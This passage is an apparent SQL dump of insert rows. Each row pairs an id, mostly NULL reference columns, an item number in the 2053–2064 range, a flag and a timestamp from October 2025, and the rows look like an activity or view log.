(20491, NULL, NULL, 2060, 1, '2025-10-05 04:11:55'),
(20492, NULL, NULL, 2054, 1, '2025-10-05 04:19:44'),
(20493, NULL, NULL, 2064, 1, '2025-10-05 04:45:25'),
(20494, NULL, NULL, 2063, 1, '2025-10-05 05:20:16'),
(20495, NULL, NULL, 2064, 1, '2025-10-05 05:31:14'),
(20496, NULL, NULL, 2053, 1, '2025-10-05 06:33:45'),
(20497, NULL, NULL, 2059, 1, '2025-10-05 07:14:52'),
(20498, NULL, NULL, 2060, 1, '2025-10-05 07:15:00'),
(20499, NULL, NULL, 2064, 1, '2025-10-05 08:30:20'),
(20500, NULL, NULL, 2058, 1, '2025-10-05 08:43:47'),
(20501, NULL, NULL, 2054, 1, '2025-10-05 08:45:42'),
(20502, NULL, NULL, 2060, 1, '2025-10-05 09:36:41'),
(20503, NULL, NULL, 2059, 1, '2025-10-05 11:15:59'),
(20504, NULL, NULL, 2055, 1, '2025-10-05 11:17:40'),
(20505, NULL, NULL, 2062, 1, '2025-10-05 11:18:53'),
(20506, NULL, NULL, 2062, 1, '2025-10-05 11:19:57'),
(20507, NULL, NULL, 2061, 1, '2025-10-05 11:20:25'),
(20508, NULL, NULL, 2063, 1, '2025-10-05 11:21:31'),
(20509, NULL, NULL, 2058, 1, '2025-10-05 11:22:23'),
(20510, NULL, NULL, 2064, 1, '2025-10-05 11:23:42'),
(20511, NULL, NULL, 2060, 1, '2025-10-05 11:25:32'),
(20512, NULL, NULL, 2054, 1, '2025-10-05 11:26:15'),
(20513, NULL, NULL, 2054, 1, '2025-10-05 11:26:24'),
(20514, NULL, NULL, 2055, 1, '2025-10-05 11:46:45'),
(20515, NULL, NULL, 2063, 1, '2025-10-05 12:38:45'),
(20516, NULL, NULL, 2054, 1, '2025-10-05 13:30:47'),
(20517, NULL, NULL, 2055, 1, '2025-10-05 13:30:49'),
(20518, NULL, NULL, 2064, 1, '2025-10-05 13:30:54'),
(20519, NULL, NULL, 2063, 1, '2025-10-05 13:30:56'),
(20520, NULL, NULL, 2062, 1, '2025-10-05 13:30:58'),
(20521, NULL, NULL, 2060, 1, '2025-10-05 13:31:01'),
(20522, NULL, NULL, 2059, 1, '2025-10-05 13:31:03'),
(20523, NULL, NULL, 2061, 1, '2025-10-05 13:31:13'),
(20524, NULL, NULL, 2058, 1, '2025-10-05 13:31:15'),
(20525, NULL, NULL, 2061, 1, '2025-10-05 14:22:14'),
(20526, NULL, NULL, 2062, 1, '2025-10-05 16:42:56'),
(20527, NULL, NULL, 2060, 1, '2025-10-05 16:44:06'),
(20528, NULL, NULL, 2062, 1, '2025-10-05 16:59:21'),
(20529, NULL, NULL, 2064, 1, '2025-10-05 17:42:54'),
(20530, NULL, NULL, 2063, 1, '2025-10-05 17:51:48'),
(20531, NULL, NULL, 2061, 1, '2025-10-05 18:30:52'),
(20532, NULL, NULL, 2062, 1, '2025-10-05 18:42:53'),
(20533, NULL, NULL, 2060, 1, '2025-10-05 19:24:28'),
(20534, NULL, NULL, 2064, 1, '2025-10-05 19:55:49'),
(20535, NULL, NULL, 2054, 1, '2025-10-05 21:46:47'),
(20536, NULL, NULL, 2064, 1, '2025-10-06 00:33:29'),
(20537, NULL, NULL, 2059, 1, '2025-10-06 02:48:46'),
(20538, NULL, NULL, 2059, 1, '2025-10-06 04:14:09'),
(20539, NULL, NULL, 2062, 1, '2025-10-06 04:14:29'),
(20540, NULL, NULL, 2054, 1, '2025-10-06 04:15:03'),
(20541, NULL, NULL, 2061, 1, '2025-10-06 04:15:22'),
(20542, NULL, NULL, 2064, 1, '2025-10-06 04:15:31'),
(20543, NULL, NULL, 2058, 1, '2025-10-06 04:16:22'),
(20544, NULL, NULL, 2063, 1, '2025-10-06 04:17:45'),
(20545, NULL, NULL, 2055, 1, '2025-10-06 04:22:11'),
(20546, NULL, NULL, 2060, 1, '2025-10-06 04:24:12'),
(20547, NULL, NULL, 2054, 1, '2025-10-06 07:47:10'),
(20548, NULL, NULL, 2055, 1, '2025-10-06 07:51:54'),
(20549, NULL, NULL, 2054, 1, '2025-10-06 08:02:24'),
(20550, NULL, NULL, 2060, 1, '2025-10-06 08:54:28'),
(20551, NULL, NULL, 2062, 1, '2025-10-06 16:03:24'),
(20552, NULL, NULL, 2058, 1, '2025-10-06 17:13:53'),
(20553, NULL, NULL, 2060, 1, '2025-10-06 17:46:54'),
(20554, NULL, NULL, 2064, 1, '2025-10-06 18:18:14'),
(20555, NULL, NULL, 2064, 1, '2025-10-06 19:09:18'),
(20556, NULL, NULL, 2059, 1, '2025-10-06 19:23:31'),
(20557, NULL, NULL, 2058, 1, '2025-10-06 19:32:40'),
(20558, NULL, NULL, 2064, 1, '2025-10-06 20:36:33'),
(20559, NULL, NULL, 2064, 1, '2025-10-06 22:40:31'),
(20560, NULL, NULL, 2063, 1, '2025-10-06 22:58:29'),
(20561, NULL, NULL, 2053, 1, '2025-10-06 23:01:38'),
(20562, NULL, NULL, 2059, 1, '2025-10-07 01:31:55'),
(20563, NULL, NULL, 2064, 1, '2025-10-07 02:08:08'),
(20564, NULL, NULL, 2059, 1, '2025-10-07 03:20:01'),
(20565, NULL, NULL, 2063, 1, '2025-10-07 05:20:15'),
(20566, NULL, NULL, 2064, 1, '2025-10-07 06:23:11'),
(20567, NULL, NULL, 2064, 1, '2025-10-07 06:23:15'),
(20568, NULL, NULL, 2060, 1, '2025-10-07 06:29:33'),
(20569, NULL, NULL, 2059, 1, '2025-10-07 06:53:43'),
(20570, NULL, NULL, 2064, 1, '2025-10-07 07:19:03'),
(20571, 3763, NULL, 2064, 1, '2025-10-07 13:54:29'),
(20573, NULL, NULL, 2062, 1, '2025-10-07 15:59:28'),
(20574, NULL, NULL, 2060, 1, '2025-10-07 16:10:18'),
(20575, NULL, NULL, 2062, 1, '2025-10-07 18:08:12'),
(20576, NULL, NULL, 2054, 1, '2025-10-07 19:57:23'),
(20577, NULL, NULL, 2058, 1, '2025-10-07 19:57:27'),
(20578, NULL, NULL, 2058, 1, '2025-10-07 23:30:29'),
(20579, NULL, NULL, 2064, 1, '2025-10-08 03:28:47'),
(20580, NULL, NULL, 2064, 1, '2025-10-08 06:21:14'),
(20581, NULL, NULL, 2061, 1, '2025-10-08 07:03:01'),
(20582, NULL, NULL, 2058, 1, '2025-10-08 07:47:00'),
(20583, NULL, NULL, 2060, 1, '2025-10-08 11:16:29'),
(20584, NULL, NULL, 2060, 1, '2025-10-08 13:45:33'),
(20585, NULL, NULL, 2064, 1, '2025-10-08 13:47:18'),
(20586, NULL, NULL, 2064, 1, '2025-10-08 14:22:52'),
(20587, NULL, NULL, 2064, 1, '2025-10-08 14:22:57'),
(20588, NULL, NULL, 2060, 1, '2025-10-08 15:48:16'),
(20589, NULL, NULL, 2062, 1, '2025-10-08 16:18:12'),
(20590, NULL, NULL, 2053, 1, '2025-10-09 01:44:44'),
(20591, 3768, NULL, 2064, 1, '2025-10-09 05:09:49'),
(20592, NULL, NULL, 2060, 1, '2025-10-09 06:17:51'),
(20593, NULL, NULL, 2055, 1, '2025-10-09 06:38:06'),
(20594, NULL, NULL, 2064, 1, '2025-10-09 07:07:56'),
(20595, NULL, NULL, 2054, 1, '2025-10-09 08:48:30'),
(20596, NULL, NULL, 2054, 1, '2025-10-09 09:20:57'),
(20597, NULL, NULL, 2054, 1, '2025-10-09 11:40:44'),
(20598, NULL, NULL, 2063, 1, '2025-10-09 12:17:49'),
(20599, NULL, NULL, 2059, 1, '2025-10-09 12:19:24'),
(20600, NULL, NULL, 2055, 1, '2025-10-09 12:21:16'),
(20601, NULL, NULL, 2064, 1, '2025-10-09 12:22:04'),
(20602, NULL, NULL, 2064, 1, '2025-10-09 14:22:14'),
(20603, NULL, NULL, 2060, 1, '2025-10-09 16:35:03'),
(20604, NULL, NULL, 2054, 1, '2025-10-09 16:51:05'),
(20605, NULL, NULL, 2062, 1, '2025-10-09 17:08:22'),
(20606, NULL, NULL, 2059, 1, '2025-10-09 18:21:36'),
(20607, NULL, NULL, 2064, 1, '2025-10-09 22:13:14'),
(20608, NULL, NULL, 2060, 1, '2025-10-09 22:24:11'),
(20609, NULL, NULL, 2062, 1, '2025-10-09 22:41:05'),
(20610, NULL, NULL, 2063, 1, '2025-10-09 22:41:10'),
(20611, NULL, NULL, 2061, 1, '2025-10-09 22:41:18'),
(20612, NULL, NULL, 2061, 1, '2025-10-09 22:59:27'),
(20613, NULL, NULL, 2053, 1, '2025-10-10 01:50:42'),
(20614, NULL, NULL, 2062, 1, '2025-10-10 01:59:22'),
(20615, NULL, NULL, 2059, 1, '2025-10-10 02:04:30'),
(20616, NULL, NULL, 2064, 1, '2025-10-10 02:07:07'),
(20617, NULL, NULL, 2054, 1, '2025-10-10 03:50:06'),
(20618, NULL, NULL, 2054, 1, '2025-10-10 04:18:25'),
(20619, NULL, NULL, 2063, 1, '2025-10-10 04:21:01'),
(20620, NULL, NULL, 2060, 1, '2025-10-10 04:47:28'),
(20621, NULL, NULL, 2060, 1, '2025-10-10 06:53:51'),
(20622, NULL, NULL, 2062, 1, '2025-10-10 07:13:19'),
(20623, NULL, NULL, 2053, 1, '2025-10-10 07:16:24'),
(20624, NULL, NULL, 2055, 1, '2025-10-10 15:20:24'),
(20625, NULL, NULL, 2061, 1, '2025-10-10 16:29:21'),
(20626, NULL, NULL, 2055, 1, '2025-10-10 16:40:08'),
(20627, NULL, NULL, 2054, 1, '2025-10-10 16:50:37'),
(20628, NULL, NULL, 2062, 1, '2025-10-10 16:51:11'),
(20629, NULL, NULL, 2062, 1, '2025-10-10 16:51:25'),
(20630, NULL, NULL, 2062, 1, '2025-10-10 17:09:01'),
(20631, NULL, NULL, 2060, 1, '2025-10-10 17:24:50'),
(20632, NULL, NULL, 2064, 1, '2025-10-10 18:41:52'),
(20633, NULL, NULL, 2064, 1, '2025-10-10 18:48:46'),
(20634, NULL, NULL, 2060, 1, '2025-10-10 19:10:11'),
(20635, NULL, NULL, 2058, 1, '2025-10-10 19:58:54'),
(20636, NULL, NULL, 2064, 1, '2025-10-10 20:00:17'),
(20637, NULL, NULL, 2054, 1, '2025-10-10 21:19:58'),
(20638, NULL, NULL, 2054, 1, '2025-10-10 22:21:19'),
(20639, NULL, NULL, 2064, 1, '2025-10-10 23:31:09'),
(20640, NULL, NULL, 2064, 1, '2025-10-11 05:08:40'),
(20641, NULL, NULL, 2061, 1, '2025-10-11 05:38:09'),
(20642, NULL, NULL, 2054, 1, '2025-10-11 05:41:18'),
(20643, NULL, NULL, 2058, 1, '2025-10-11 05:41:59'),
(20644, NULL, NULL, 2054, 1, '2025-10-11 06:27:46'),
(20645, NULL, NULL, 2063, 1, '2025-10-11 06:33:54'),
(20646, NULL, NULL, 2059, 1, '2025-10-11 06:37:25'),
(20647, NULL, NULL, 2063, 1, '2025-10-11 07:37:17'),
(20648, NULL, NULL, 2060, 1, '2025-10-11 09:34:55'),
(20649, NULL, NULL, 2055, 1, '2025-10-11 12:48:56'),
(20650, NULL, NULL, 2064, 1, '2025-10-11 14:20:26'),
(20651, NULL, NULL, 2059, 1, '2025-10-11 15:13:46'),
(20652, NULL, NULL, 2063, 1, '2025-10-11 15:20:01'),
(20653, NULL, NULL, 2062, 1, '2025-10-11 16:36:17'),
(20654, NULL, NULL, 2062, 1, '2025-10-11 16:37:07'),
(20655, NULL, NULL, 2060, 1, '2025-10-11 17:29:41'),
(20656, 3784, NULL, 2064, 1, '2025-10-11 17:54:09'),
(20657, NULL, NULL, 2064, 1, '2025-10-11 18:06:14'),
(20658, NULL, NULL, 2059, 1, '2025-10-11 18:14:14'),
(20659, NULL, NULL, 2058, 1, '2025-10-11 18:26:31'),
(20660, NULL, NULL, 2062, 1, '2025-10-11 23:33:39'),
(20661, NULL, NULL, 2058, 1, '2025-10-11 23:57:49'),
(20662, NULL, NULL, 2059, 1, '2025-10-12 00:32:13'),
(20663, NULL, NULL, 2064, 1, '2025-10-12 04:47:39'),
(20664, NULL, NULL, 2061, 1, '2025-10-12 05:57:00'),
(20665, NULL, NULL, 2060, 1, '2025-10-12 06:49:24'),
(20666, NULL, NULL, 2059, 1, '2025-10-12 06:49:30'),
(20667, NULL, NULL, 2054, 1, '2025-10-12 07:42:06'),
(20668, NULL, NULL, 2058, 1, '2025-10-12 08:48:33'),
(20669, NULL, NULL, 2064, 1, '2025-10-12 09:25:54'),
(20670, NULL, NULL, 2064, 1, '2025-10-12 10:24:55'),
(20671, NULL, NULL, 2060, 1, '2025-10-12 10:32:10'),
(20672, NULL, NULL, 2054, 1, '2025-10-12 10:44:15'),
(20673, NULL, NULL, 2064, 1, '2025-10-12 11:09:31'),
(20674, NULL, NULL, 2062, 1, '2025-10-12 13:07:16'),
(20675, NULL, NULL, 2060, 1, '2025-10-12 14:34:26'),
(20676, NULL, NULL, 2060, 1, '2025-10-12 14:37:14'),
(20677, NULL, NULL, 2061, 1, '2025-10-12 16:11:36'),
(20678, NULL, NULL, 2062, 1, '2025-10-12 16:18:29'),
(20679, NULL, NULL, 2062, 1, '2025-10-12 16:27:04'),
(20680, NULL, NULL, 2060, 1, '2025-10-12 19:02:22'),
(20681, NULL, NULL, 2062, 1, '2025-10-12 19:25:24'),
(20682, NULL, NULL, 2060, 1, '2025-10-12 20:34:03'),
(20683, NULL, NULL, 2054, 1, '2025-10-12 20:44:25'),
(20684, NULL, NULL, 2063, 1, '2025-10-12 21:21:46'),
(20685, NULL, NULL, 2061, 1, '2025-10-12 21:22:06'),
(20686, NULL, NULL, 2060, 1, '2025-10-12 21:50:53'),
(20687, NULL, NULL, 2054, 1, '2025-10-12 21:51:39'),
(20688, NULL, NULL, 2064, 1, '2025-10-12 23:30:47'),
(20689, NULL, NULL, 2061, 1, '2025-10-13 01:26:23'),
(20690, NULL, NULL, 2063, 1, '2025-10-13 03:07:10'),
(20691, NULL, NULL, 2059, 1, '2025-10-13 05:05:25'),
(20692, NULL, NULL, 2061, 1, '2025-10-13 05:13:57'),
(20693, NULL, NULL, 2060, 1, '2025-10-13 07:07:33'),
(20694, NULL, NULL, 2064, 1, '2025-10-13 07:36:11'),
(20695, NULL, NULL, 2059, 1, '2025-10-13 07:50:15'),
(20696, NULL, NULL, 2061, 1, '2025-10-13 10:09:59'),
(20697, 3792, NULL, 2064, 1, '2025-10-13 10:19:34'),
(20698, NULL, NULL, 2054, 1, '2025-10-13 10:40:41'),
(20699, NULL, NULL, 2059, 1, '2025-10-13 10:57:10'),
(20700, NULL, NULL, 2058, 1, '2025-10-13 10:57:16'),
(20701, NULL, NULL, 2058, 1, '2025-10-13 11:49:57'),
(20702, NULL, NULL, 2054, 1, '2025-10-13 11:57:02'),
(20703, NULL, NULL, 2064, 1, '2025-10-13 14:20:56'),
(20704, NULL, NULL, 2058, 1, '2025-10-13 15:25:01'),
(20705, NULL, NULL, 2062, 1, '2025-10-13 15:29:09'),
(20706, NULL, NULL, 2062, 1, '2025-10-13 15:29:42'),
(20707, NULL, NULL, 2059, 1, '2025-10-13 17:05:48'),
(20708, NULL, NULL, 2054, 1, '2025-10-13 17:57:46'),
(20709, NULL, NULL, 2060, 1, '2025-10-13 18:42:35'),
(20710, NULL, NULL, 2064, 1, '2025-10-13 20:20:02'),
(20711, NULL, NULL, 2064, 1, '2025-10-13 21:52:39'),
(20712, NULL, NULL, 2054, 1, '2025-10-13 23:36:10'),
(20713, NULL, NULL, 2060, 1, '2025-10-14 07:15:28'),
(20714, NULL, NULL, 2060, 1, '2025-10-14 08:37:54'),
(20715, NULL, NULL, 2064, 1, '2025-10-14 09:25:59'),
(20716, NULL, NULL, 2054, 1, '2025-10-14 09:39:49'),
(20717, NULL, NULL, 2059, 1, '2025-10-14 10:32:35'),
(20718, NULL, NULL, 2054, 1, '2025-10-14 10:55:57'),
(20719, NULL, NULL, 2058, 1, '2025-10-14 11:24:06'),
(20720, NULL, NULL, 2060, 1, '2025-10-14 11:44:14'),
(20721, NULL, NULL, 2064, 1, '2025-10-14 11:54:49'),
(20722, NULL, NULL, 2062, 1, '2025-10-14 12:02:16'),
(20723, NULL, NULL, 2064, 1, '2025-10-14 12:02:21'),
(20724, NULL, NULL, 2063, 1, '2025-10-14 12:02:23'),
(20725, NULL, NULL, 2053, 1, '2025-10-14 12:02:36'),
(20726, NULL, NULL, 2061, 1, '2025-10-14 12:12:15'),
(20727, NULL, NULL, 2060, 1, '2025-10-14 14:03:37'),
(20728, NULL, NULL, 2063, 1, '2025-10-14 14:12:11'),
(20729, NULL, NULL, 2058, 1, '2025-10-14 14:34:51'),
(20730, NULL, NULL, 2055, 1, '2025-10-14 15:15:53'),
(20731, NULL, NULL, 2060, 1, '2025-10-14 15:28:25'),
(20732, NULL, NULL, 2060, 1, '2025-10-14 15:28:28'),
(20733, NULL, NULL, 2062, 1, '2025-10-14 15:39:53'),
(20734, NULL, NULL, 2061, 1, '2025-10-14 16:21:21'),
(20735, NULL, NULL, 2062, 1, '2025-10-14 16:55:25'),
(20736, NULL, NULL, 2054, 1, '2025-10-14 18:00:49'),
(20737, NULL, NULL, 2060, 1, '2025-10-14 18:27:07'),
(20738, NULL, NULL, 2063, 1, '2025-10-14 18:35:06'),
(20739, NULL, NULL, 2058, 1, '2025-10-14 18:56:23'),
(20740, NULL, NULL, 2062, 1, '2025-10-14 19:18:10'),
(20741, NULL, NULL, 2055, 1, '2025-10-14 19:37:30'),
(20742, NULL, NULL, 2058, 1, '2025-10-14 19:42:28'),
(20743, NULL, NULL, 2054, 1, '2025-10-14 19:42:32'),
(20744, NULL, NULL, 2061, 1, '2025-10-14 20:43:44'),
(20745, NULL, NULL, 2064, 1, '2025-10-14 20:53:38'),
(20746, NULL, NULL, 2062, 1, '2025-10-14 21:19:07'),
(20747, NULL, NULL, 2054, 1, '2025-10-14 21:55:22'),
(20748, NULL, NULL, 2054, 1, '2025-10-14 22:23:32'),
(20749, NULL, NULL, 2064, 1, '2025-10-14 22:25:12'),
(20750, NULL, NULL, 2059, 1, '2025-10-14 22:38:18'),
(20751, NULL, NULL, 2064, 1, '2025-10-14 22:51:51'),
(20752, NULL, NULL, 2054, 1, '2025-10-14 23:00:22'),
(20753, NULL, NULL, 2054, 1, '2025-10-14 23:52:39'),
(20754, NULL, NULL, 2064, 1, '2025-10-15 00:26:16'),
(20755, NULL, NULL, 2062, 1, '2025-10-15 01:45:03'),
(20756, NULL, NULL, 2060, 1, '2025-10-15 03:43:12'),
(20757, NULL, NULL, 2059, 1, '2025-10-15 04:32:12'),
(20758, NULL, NULL, 2054, 1, '2025-10-15 07:35:33'),
(20759, NULL, NULL, 2054, 1, '2025-10-15 09:17:35'),
(20760, NULL, NULL, 2055, 1, '2025-10-15 09:17:39'),
(20761, NULL, NULL, 2058, 1, '2025-10-15 09:17:41'),
(20762, NULL, NULL, 2059, 1, '2025-10-15 09:17:44'),
(20763, NULL, NULL, 2060, 1, '2025-10-15 09:17:46'),
(20764, NULL, NULL, 2061, 1, '2025-10-15 09:17:48'),
(20765, NULL, NULL, 2062, 1, '2025-10-15 09:17:51'),
(20766, NULL, NULL, 2063, 1, '2025-10-15 09:17:54'),
(20767, NULL, NULL, 2064, 1, '2025-10-15 09:18:03'),
(20768, NULL, NULL, 2064, 1, '2025-10-15 09:18:06'),
(20769, NULL, NULL, 2064, 1, '2025-10-15 09:18:09'),
(20770, NULL, NULL, 2064, 1, '2025-10-15 11:46:44'),
(20771, NULL, NULL, 2060, 1, '2025-10-15 11:57:20'),
(20772, NULL, NULL, 2064, 1, '2025-10-15 13:02:07'),
(20773, NULL, NULL, 2064, 1, '2025-10-15 13:50:33'),
(20774, NULL, NULL, 2060, 1, '2025-10-15 13:56:32'),
(20775, NULL, NULL, 2054, 1, '2025-10-15 14:32:11'),
(20776, NULL, NULL, 2061, 1, '2025-10-15 15:23:47'),
(20777, NULL, NULL, 2060, 1, '2025-10-15 15:34:48'),
(20778, NULL, NULL, 2062, 1, '2025-10-15 15:50:52'),
(20779, NULL, NULL, 2062, 1, '2025-10-15 16:26:00'),
(20780, NULL, NULL, 2062, 1, '2025-10-15 16:50:44'),
(20781, NULL, NULL, 2064, 1, '2025-10-15 17:30:37'),
(20782, NULL, NULL, 2063, 1, '2025-10-15 18:58:13'),
(20783, NULL, NULL, 2060, 1, '2025-10-15 23:53:49'),
(20784, NULL, NULL, 2064, 1, '2025-10-16 01:19:29'),
(20785, NULL, NULL, 2058, 1, '2025-10-16 01:28:24'),
(20786, NULL, NULL, 2064, 1, '2025-10-16 03:07:06'),
(20787, NULL, NULL, 2063, 1, '2025-10-16 03:39:13'),
(20788, NULL, NULL, 2055, 1, '2025-10-16 04:07:34'),
(20789, NULL, NULL, 2060, 1, '2025-10-16 04:50:38'),
(20790, NULL, NULL, 2064, 1, '2025-10-16 05:01:51'),
(20791, NULL, NULL, 2063, 1, '2025-10-16 05:10:45'),
(20792, NULL, NULL, 2060, 1, '2025-10-16 05:20:46'),
(20793, NULL, NULL, 2061, 1, '2025-10-16 05:31:16'),
(20794, NULL, NULL, 2063, 1, '2025-10-16 05:39:06'),
(20795, NULL, NULL, 2055, 1, '2025-10-16 05:40:41'),
(20796, NULL, NULL, 2054, 1, '2025-10-16 05:50:13'),
(20797, NULL, NULL, 2058, 1, '2025-10-16 06:08:19'),
(20798, NULL, NULL, 2054, 1, '2025-10-16 06:55:37'),
(20799, NULL, NULL, 2054, 1, '2025-10-16 07:00:30'),
(20800, NULL, NULL, 2061, 1, '2025-10-16 07:00:35'),
(20801, NULL, NULL, 2064, 1, '2025-10-16 07:20:08'),
(20802, NULL, NULL, 2064, 1, '2025-10-16 07:23:28'),
(20803, NULL, NULL, 2055, 1, '2025-10-16 07:58:52'),
(20804, NULL, NULL, 2060, 1, '2025-10-16 08:41:41'),
(20805, NULL, NULL, 2062, 1, '2025-10-16 08:51:56'),
(20806, NULL, NULL, 2059, 1, '2025-10-16 08:52:03'),
(20807, NULL, NULL, 2064, 1, '2025-10-16 11:25:39'),
(20808, NULL, NULL, 2059, 1, '2025-10-16 12:18:41'),
(20809, NULL, NULL, 2060, 1, '2025-10-16 12:18:55'),
(20810, NULL, NULL, 2064, 1, '2025-10-16 13:01:59'),
(20811, NULL, NULL, 2064, 1, '2025-10-16 14:59:04'),
(20812, NULL, NULL, 2063, 1, '2025-10-16 15:49:15'),
(20813, NULL, NULL, 2062, 1, '2025-10-16 15:55:15'),
(20814, NULL, NULL, 2064, 1, '2025-10-16 16:31:54'),
(20815, NULL, NULL, 2059, 1, '2025-10-16 16:41:32'),
(20816, NULL, NULL, 2058, 1, '2025-10-16 16:55:10'),
(20817, NULL, NULL, 2059, 1, '2025-10-16 17:45:55'),
(20818, NULL, NULL, 2062, 1, '2025-10-16 19:46:51'),
(20819, NULL, NULL, 2064, 1, '2025-10-16 19:48:10'),
(20820, NULL, NULL, 2064, 1, '2025-10-16 20:30:39'),
(20821, NULL, NULL, 2063, 1, '2025-10-16 20:51:09'),
(20822, NULL, NULL, 2054, 1, '2025-10-16 20:55:24'),
(20823, NULL, NULL, 2064, 1, '2025-10-16 22:15:32'),
(20824, NULL, NULL, 2061, 1, '2025-10-16 22:40:59'),
(20825, NULL, NULL, 2062, 1, '2025-10-16 22:41:03'),
(20826, NULL, NULL, 2063, 1, '2025-10-16 22:41:12'),
(20827, NULL, NULL, 2055, 1, '2025-10-16 23:14:35'),
(20828, NULL, NULL, 2060, 1, '2025-10-16 23:45:53'),
(20829, NULL, NULL, 2058, 1, '2025-10-17 00:11:46'),
(20830, NULL, NULL, 2059, 1, '2025-10-17 01:36:19'),
(20831, NULL, NULL, 2053, 1, '2025-10-17 01:41:51'),
(20832, NULL, NULL, 2058, 1, '2025-10-17 01:56:22'),
(20833, NULL, NULL, 2064, 1, '2025-10-17 02:56:49'),
(20834, NULL, NULL, 2060, 1, '2025-10-17 05:02:37'),
(20835, NULL, NULL, 2063, 1, '2025-10-17 05:39:06'),
(20836, NULL, NULL, 2064, 1, '2025-10-17 06:03:50'),
(20837, NULL, NULL, 2064, 1, '2025-10-17 06:04:28'),
(20838, NULL, NULL, 2061, 1, '2025-10-17 06:05:23'),
(20839, NULL, NULL, 2060, 1, '2025-10-17 06:29:07'),
(20840, NULL, NULL, 2058, 1, '2025-10-17 06:41:09'),
(20841, NULL, NULL, 2063, 1, '2025-10-17 07:50:52'),
(20842, NULL, NULL, 2060, 1, '2025-10-17 08:07:20'),
(20843, NULL, NULL, 2058, 1, '2025-10-17 08:51:44'),
(20844, NULL, NULL, 2063, 1, '2025-10-17 10:46:27'),
(20845, NULL, NULL, 2055, 1, '2025-10-17 11:09:03'),
(20846, NULL, NULL, 2064, 1, '2025-10-17 11:24:08'),
(20847, NULL, NULL, 2064, 1, '2025-10-17 11:33:44'),
(20848, NULL, NULL, 2059, 1, '2025-10-17 12:30:43'),
(20849, NULL, NULL, 2054, 1, '2025-10-17 15:03:33'),
(20850, NULL, NULL, 2061, 1, '2025-10-17 15:07:02'),
(20851, NULL, NULL, 2060, 1, '2025-10-17 15:15:10'),
(20852, NULL, NULL, 2064, 1, '2025-10-17 15:59:49'),
(20853, NULL, NULL, 2059, 1, '2025-10-17 16:23:56'),
(20854, NULL, NULL, 2064, 1, '2025-10-17 16:24:14'),
(20855, NULL, NULL, 2062, 1, '2025-10-17 16:30:02'),
(20856, NULL, NULL, 2059, 1, '2025-10-17 16:32:27'),
(20857, NULL, NULL, 2062, 1, '2025-10-17 17:03:05'),
(20858, NULL, NULL, 2064, 1, '2025-10-17 17:08:40'),
(20859, NULL, NULL, 2064, 1, '2025-10-17 18:17:14'),
(20860, NULL, NULL, 2062, 1, '2025-10-17 19:28:16'),
(20861, NULL, NULL, 2064, 1, '2025-10-17 19:53:38'),
(20862, NULL, NULL, 2062, 1, '2025-10-17 22:28:32'),
(20863, NULL, NULL, 2060, 1, '2025-10-18 01:00:31'),
(20864, NULL, NULL, 2064, 1, '2025-10-18 04:07:31'),
(20865, NULL, NULL, 2064, 1, '2025-10-18 04:14:23'),
(20866, NULL, NULL, 2064, 1, '2025-10-18 04:38:21'),
(20867, NULL, NULL, 2059, 1, '2025-10-18 05:19:52'),
(20868, NULL, NULL, 2060, 1, '2025-10-18 05:44:01'),
(20869, NULL, NULL, 2060, 1, '2025-10-18 08:40:25'),
(20870, NULL, NULL, 2058, 1, '2025-10-18 11:06:42'),
(20871, NULL, NULL, 2055, 1, '2025-10-18 11:29:32'),
(20872, NULL, NULL, 2061, 1, '2025-10-18 11:49:36'),
(20873, NULL, NULL, 2055, 1, '2025-10-18 12:36:19'),
(20874, NULL, NULL, 2060, 1, '2025-10-18 12:58:21'),
(20875, NULL, NULL, 2064, 1, '2025-10-18 13:05:54'),
(20876, NULL, NULL, 2063, 1, '2025-10-18 13:07:56'),
(20877, NULL, NULL, 2064, 1, '2025-10-18 14:25:47'),
(20878, NULL, NULL, 2054, 1, '2025-10-18 15:31:32'),
(20879, NULL, NULL, 2060, 1, '2025-10-18 15:50:42'),
(20880, NULL, NULL, 2061, 1, '2025-10-18 16:06:23'),
(20881, NULL, NULL, 2064, 1, '2025-10-18 16:33:52'),
(20882, NULL, NULL, 2064, 1, '2025-10-18 16:37:05'),
(20883, NULL, NULL, 2062, 1, '2025-10-18 17:30:07'),
(20884, NULL, NULL, 2059, 1, '2025-10-18 17:45:04'),
(20885, NULL, NULL, 2060, 1, '2025-10-18 17:55:54'),
(20886, NULL, NULL, 2064, 1, '2025-10-18 18:52:08'),
(20887, NULL, NULL, 2059, 1, '2025-10-18 19:48:50'),
(20888, NULL, NULL, 2062, 1, '2025-10-18 20:12:02'),
(20889, NULL, NULL, 2064, 1, '2025-10-18 20:12:30'),
(20890, NULL, NULL, 2055, 1, '2025-10-18 20:12:47'),
(20891, NULL, NULL, 2064, 1, '2025-10-18 20:13:27'),
(20892, NULL, NULL, 2063, 1, '2025-10-18 21:02:40'),
(20893, NULL, NULL, 2063, 1, '2025-10-18 21:03:25'),
(20894, NULL, NULL, 2064, 1, '2025-10-18 21:07:05'),
(20895, NULL, NULL, 2064, 1, '2025-10-18 21:07:51'),
(20896, NULL, NULL, 2064, 1, '2025-10-18 21:08:20'),
(20897, NULL, NULL, 2061, 1, '2025-10-18 21:09:57'),
(20898, NULL, NULL, 2059, 1, '2025-10-18 21:11:38'),
(20899, NULL, NULL, 2058, 1, '2025-10-18 21:13:43'),
(20900, NULL, NULL, 2054, 1, '2025-10-18 21:17:22'),
(20901, NULL, NULL, 2060, 1, '2025-10-18 21:19:47'),
(20902, NULL, NULL, 2060, 1, '2025-10-18 21:20:35'),
(20903, NULL, NULL, 2064, 1, '2025-10-18 22:26:15'),
(20904, NULL, NULL, 2064, 1, '2025-10-18 23:18:30'),
(20905, NULL, NULL, 2060, 1, '2025-10-19 02:22:46'),
(20906, NULL, NULL, 2060, 1, '2025-10-19 03:47:40'),
(20907, NULL, NULL, 2058, 1, '2025-10-19 04:32:52'),
(20908, NULL, NULL, 2064, 1, '2025-10-19 05:00:13'),
(20909, NULL, NULL, 2059, 1, '2025-10-19 05:30:47'),
(20910, NULL, NULL, 2059, 1, '2025-10-19 05:48:13'),
(20911, NULL, NULL, 2063, 1, '2025-10-19 06:31:50'),
(20912, NULL, NULL, 2060, 1, '2025-10-19 06:50:58'),
(20913, NULL, NULL, 2059, 1, '2025-10-19 06:51:02'),
(20914, NULL, NULL, 2064, 1, '2025-10-19 07:07:44'),
(20915, NULL, NULL, 2055, 1, '2025-10-19 07:09:14'),
(20916, NULL, NULL, 2064, 1, '2025-10-19 08:04:08'),
(20917, NULL, NULL, 2058, 1, '2025-10-19 08:43:33'),
(20918, NULL, NULL, 2054, 1, '2025-10-19 08:52:28'),
(20919, NULL, NULL, 2054, 1, '2025-10-19 09:05:00'),
